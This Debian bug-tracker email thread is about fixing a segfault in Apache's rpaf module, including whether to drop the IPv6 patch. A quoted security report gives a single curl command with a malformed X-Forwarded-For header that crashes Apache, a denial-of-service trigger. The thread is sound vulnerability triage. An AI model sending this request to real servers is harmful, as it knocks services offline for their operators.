tag 683984 +pending
thanks
06.08.2012 4:27 пользователь "Luciano Bello" <luci...@debian.org> написал:
> Sébastien Bocahu reported to the security team:
> > (...)
> > A single request makes Apache segfault. On some of the environments I
> tested,
> > it even kills all Apache processes (they become zombies).
Thank you for bugreport.
> > The magick request is the following:
> > curl -H "x-forwarded-for: 1'\"5000" -H "Host: a.vhost.example.com"
> > reverseproxy
> >
> > Apache processes will segfault, hence a potential DOS issue.
This works for very typical setups. Bad news. And it looks as a ("potential",
yeh) remote hole.
> > From my experiments, version 0.6 fixes the issue (IPv6 patched or
> unpatched).
Yep. Tag this as fixed for 0.6+ debian packages.
> Please, prepare a minimal patch for stable
The "minimal" patch is to drop 030_ipv6.patch. I can't confirm that
this bug is *not* reproducible for 0.6 version *with* the above patch.
Can you ask bugreporter to report details on:
-->8--
rpaf 0.6 is available in Debian wheezy. The IPv6 patched is not applied
though. I patched myself and tested it on the
same squeeze environment: there is no more segfaults.
-->8--
?
Unmodified 030_ipv6.patch still produce segfaults on 0.6+, for me.
> and contact the security team to
> update the package.
Reply to contacts of this bugreport is ok, or I should do anything else?
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
